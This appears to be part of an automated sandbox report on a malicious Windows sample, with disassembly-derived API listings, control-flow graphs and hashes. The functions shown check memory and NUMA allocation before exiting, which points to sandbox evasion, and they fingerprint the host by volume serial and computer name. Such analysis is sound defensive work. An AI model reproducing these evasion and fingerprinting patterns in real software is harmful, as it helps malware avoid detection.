                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 85f988a4e413cd001c4d2414fa88e5679d53a61e37b06d2bb22a5e302ee02a39
                                • Instruction ID: c219af4575d0e541cd868e280b23150e3388005909450f43512ef92efd3ff6f4
                                • Opcode Fuzzy Hash: 85f988a4e413cd001c4d2414fa88e5679d53a61e37b06d2bb22a5e302ee02a39
                                • Instruction Fuzzy Hash: 5AE260709053418FD774DF29C488B6ABBE0BF88314F5885ADE6CD8B25ADB39D845CB42
                                APIs
                                • lstrlen.KERNEL32(00D560D8), ref: 0100F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F47B
                                • lstrcpy.KERNEL32(00000000,00D560D8), ref: 0100F4BB
                                • lstrcpy.KERNEL32(00000000,00D68BB0), ref: 0100F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0100F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100F718
                                • lstrlen.KERNEL32(00D68A40), ref: 0100F746
                                • lstrcpy.KERNEL32(00000000,00D68A40), ref: 0100F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100FA32
                                • lstrlen.KERNEL32(00D68BC0), ref: 0100FA60
                                • lstrcpy.KERNEL32(00000000,00D68BC0), ref: 0100FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 44493a5f8b0c89fdbab479667d78edb4ac55b2651ccc43fab31325ce4bae3976
                                • Instruction ID: 8b75ac733ad5a3ac25f010afc55e1336571049214b2bd234aa3449d6bcd0388a
                                • Opcode Fuzzy Hash: 44493a5f8b0c89fdbab479667d78edb4ac55b2651ccc43fab31325ce4bae3976
                                • Instruction Fuzzy Hash: 4CF17F70A01202DFEBB6CF29D448A29BBE5BF44314F28C0ADD949DB396D735D882DB41

                                 Control-flow Graph
                                 • Graph image not reproduced. Function at 1008ca0; its blocks call StrCmpCA, ExitProcess, lstrlen and lstrcpy and the subfunctions ff2a20 and ff2930.
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 41063e7337760e0534208fba7f99e0ad756fede793dbeee56a4e2b98a2212ef6
                                • Instruction ID: b894ed4f2d2caf97b786786a3ab6df014c6f7c7fa0c2f46b6c0ec528d19456cb
                                • Opcode Fuzzy Hash: 41063e7337760e0534208fba7f99e0ad756fede793dbeee56a4e2b98a2212ef6
                                • Instruction Fuzzy Hash: 93518130D04759ABEB729F69D888A2F7BF4BF04704F00D85EE582D7651D778D9829B10

                                Control-flow Graph

                                control_flow_graph 2443 1012740-1012783 GetWindowsDirectoryA 2444 1012785 2443->2444 2445 101278c-10127ea GetVolumeInformationA 2443->2445 2444->2445 2446 10127ec-10127f2 2445->2446 2447 10127f4-1012807 2446->2447 2448 1012809-1012820 GetProcessHeap RtlAllocateHeap 2446->2448 2447->2446 2449 1012822-1012824 2448->2449 2450 1012826-1012844 wsprintfA 2448->2450 2451 101285b-1012872 call 10171e0 2449->2451 2450->2451
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0101277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,010093B6,00000000,00000000,00000000,00000000), ref: 010127AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0101280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012816
                                • wsprintfA.USER32 ref: 0101283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: a682560d73238366b04cf33025f61e69c28cc6c542fce221183edb1a6b04553c
                                • Instruction ID: fe6962c043318cfb415ba471e5986e99486cf54bbb51f1a46b4841c171ed6da8
                                • Opcode Fuzzy Hash: a682560d73238366b04cf33025f61e69c28cc6c542fce221183edb1a6b04553c
                                • Instruction Fuzzy Hash: 93316FB1905219ABCB14CFB89989AEFBFBCFF58710F104169E545E7644E6348A408BA1

                                Control-flow Graph

                                control_flow_graph 2454 ff4bc0-ff4bce 2455 ff4bd0-ff4bd5 2454->2455 2455->2455 2456 ff4bd7-ff4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call ff2a20 2455->2456
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00FF4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FF4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FF4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00FF4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00FF4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: cc0eca2de563f5376aa7dc7056ad84b2e59f80715e7c38e5bf8a977a25b75c79
                                • Instruction ID: 0a26ee8e5159efeedc5de88437deb2645b53dd8c49329a449f2cf095e2ca82aa
                                • Opcode Fuzzy Hash: cc0eca2de563f5376aa7dc7056ad84b2e59f80715e7c38e5bf8a977a25b75c79
                                • Instruction Fuzzy Hash: 1D012171D00218ABDB14DFA8E845B9EBBF8EF44320F004126FA54E7390DB7499048FD4

                                Control-flow Graph

                                control_flow_graph 2459 ff1030-ff1055 GetCurrentProcess VirtualAllocExNuma 2460 ff105e-ff107b VirtualAlloc 2459->2460 2461 ff1057-ff1058 ExitProcess 2459->2461 2462 ff107d-ff1080 2460->2462 2463 ff1082-ff1088 2460->2463 2462->2463 2464 ff108a-ff10ab VirtualFree 2463->2464 2465 ff10b1-ff10b6 2463->2465 2464->2465
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                • ExitProcess.KERNEL32 ref: 00FF1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FF10AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: ace0611ac2f660848f8c199db024b7a3e4fca8e6a930eca97039406944d4460f
                                • Instruction ID: 500183b3d4e9e7e6c11a2a192b6ee0c8652d30cc915a12ebdd35f8ff9efbd0de
                                • Opcode Fuzzy Hash: ace0611ac2f660848f8c199db024b7a3e4fca8e6a930eca97039406944d4460f
                                • Instruction Fuzzy Hash: BD01D171740218BBEB304A656C1EF6A77A9AB84B19F209018F708E7280D9B5EA009A64

                                Control-flow Graph

                                control_flow_graph 2466 100ee90-100eeb5 call ff2930 2469 100eeb7-100eebf 2466->2469 2470 100eec9-100eecd call ff6c40 2466->2470 2469->2470 2471 100eec1-100eec3 lstrcpy 2469->2471 2473 100eed2-100eee8 StrCmpCA 2470->2473 2471->2470 2474 100ef11-100ef18 call ff2a20 2473->2474 2475 100eeea-100ef02 call ff2a20 call ff2930 2473->2475 2480 100ef20-100ef28 2474->2480 2485 100ef04-100ef0c 2475->2485 2486 100ef45-100efa0 call ff2a20 * 10 2475->2486 2480->2480 2482 100ef2a-100ef37 call ff2930 2480->2482 2482->2486 2490 100ef39 2482->2490 2485->2486 2489 100ef0e-100ef0f 2485->2489 2492 100ef3e-100ef3f lstrcpy 2489->2492 2490->2492 2492->2486
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: f0a16fd30f1808092b85d391d659afeec5ad78323e1c6ab770dd8674b4b617dc
                                • Instruction ID: 581de8bf05baf82f136054820987cbf6dddca63a7cdd45886ec08fd5d2846213
                                • Opcode Fuzzy Hash: f0a16fd30f1808092b85d391d659afeec5ad78323e1c6ab770dd8674b4b617dc
                                • Instruction Fuzzy Hash: CE21467062014D9BDBB1FF79DC466BE37E4AF10304F005468FA8ADB292DB78D811A790

                                Control-flow Graph

                                control_flow_graph 2547 ff10c0-ff10cb 2548 ff10d0-ff10dc 2547->2548 2550 ff10de-ff10f3 GlobalMemoryStatusEx 2548->2550 2551 ff10f5-ff1106 2550->2551 2552 ff1112-ff1114 ExitProcess 2550->2552 2553 ff111a-ff111d 2551->2553 2554 ff1108 2551->2554 2554->2552 2555 ff110a-ff1110 2554->2555 2555->2552 2555->2553
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: f6d7095f21a12cbb88d2606a415cc15e7a6c6f6a766bc9dbdba1257da2af2edc
                                • Instruction ID: d94a5136c3cfce46db961df98151c0b3c2aa2a0f1329979077bd4fa746442ea5
                                • Opcode Fuzzy Hash: f6d7095f21a12cbb88d2606a415cc15e7a6c6f6a766bc9dbdba1257da2af2edc
                                • Instruction Fuzzy Hash: E6F0827051824CDBFB246965984A73DF7DCFF01364F204929DF9AD22A1FA70C880A66B

                                Control-flow Graph

                                control_flow_graph 2556 1008c88-1008cc4 StrCmpCA 2558 1008cc6-1008cc7 ExitProcess 2556->2558 2559 1008ccd-1008ce6 2556->2559 2561 1008ee2-1008eef call ff2a20 2559->2561 2562 1008cec-1008cf1 2559->2562 2563 1008cf6-1008cf9 2562->2563 2565 1008ec3-1008edc 2563->2565 2566 1008cff 2563->2566 2565->2561 2603 1008cf3 2565->2603 2568 1008d84-1008d92 StrCmpCA 2566->2568 2569 1008da4-1008db8 StrCmpCA 2566->2569 2570 1008d06-1008d15 lstrlen 2566->2570 2571 1008e88-1008e9a lstrlen 2566->2571 2572 1008e6f-1008e7d StrCmpCA 2566->2572 2573 1008d30-1008d3f lstrlen 2566->2573 2574 1008e56-1008e64 StrCmpCA 2566->2574 2575 1008d5a-1008d69 lstrlen 2566->2575 2576 1008dbd-1008dcb StrCmpCA 2566->2576 2577 1008ddd-1008deb StrCmpCA 2566->2577 2578 1008dfd-1008e0b StrCmpCA 2566->2578 2579 1008e1d-1008e2b StrCmpCA 2566->2579 2580 1008e3d-1008e4b StrCmpCA 2566->2580 2568->2565 2584 1008d98-1008d9f 2568->2584 2569->2565 2589 1008d17-1008d1c call ff2a20 2570->2589 2590 1008d1f-1008d2b call ff2930 2570->2590 2594 1008ea4-1008eb0 call ff2930 2571->2594 2595 1008e9c-1008ea1 call ff2a20 2571->2595 2572->2565 2593 1008e7f-1008e86 2572->2593 2596 1008d41-1008d46 call ff2a20 2573->2596 2597 1008d49-1008d55 call ff2930 2573->2597 2574->2565 2592 1008e66-1008e6d 2574->2592 2581 1008d73-1008d7f call ff2930 2575->2581 2582 1008d6b-1008d70 call ff2a20 2575->2582 2576->2565 2585 1008dd1-1008dd8 2576->2585 2577->2565 2586 1008df1-1008df8 2577->2586 2578->2565 2587 1008e11-1008e18 2578->2587 2579->2565 2588 1008e31-1008e38 2579->2588 2580->2565 2591 1008e4d-1008e54 2580->2591 2615 1008eb3-1008eb5 2581->2615 2582->2581 2584->2565 2585->2565 2586->2565 2587->2565 2588->2565 2589->2590 2590->2615 2591->2565 2592->2565 2593->2565 2594->2615 2595->2594 2596->2597 2597->2615 2603->2563 2615->2565 2616 1008eb7-1008eb9 2615->2616 2616->2565 2617 1008ebb-1008ebd lstrcpy 2616->2617 2617->2565
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 48d1d805d9f81dedad34cc8fbbadd1cc419b38b357175283ef8b82441795eb01
                                • Instruction ID: 200d65c016cad2cdf5fbd23dd3753a39ecffb3c5e8cb2889ec128c228c441aa5
                                • Opcode Fuzzy Hash: 48d1d805d9f81dedad34cc8fbbadd1cc419b38b357175283ef8b82441795eb01
                                • Instruction Fuzzy Hash: 85F06D34610319EFDB249FADD888D16B7F8EF49300F401468F609CB220D274AE00DBA5

                                Control-flow Graph

                                control_flow_graph 2618 1012ad0-1012b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2619 1012b44-1012b59 2618->2619 2620 1012b24-1012b36 2618->2620
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012B06
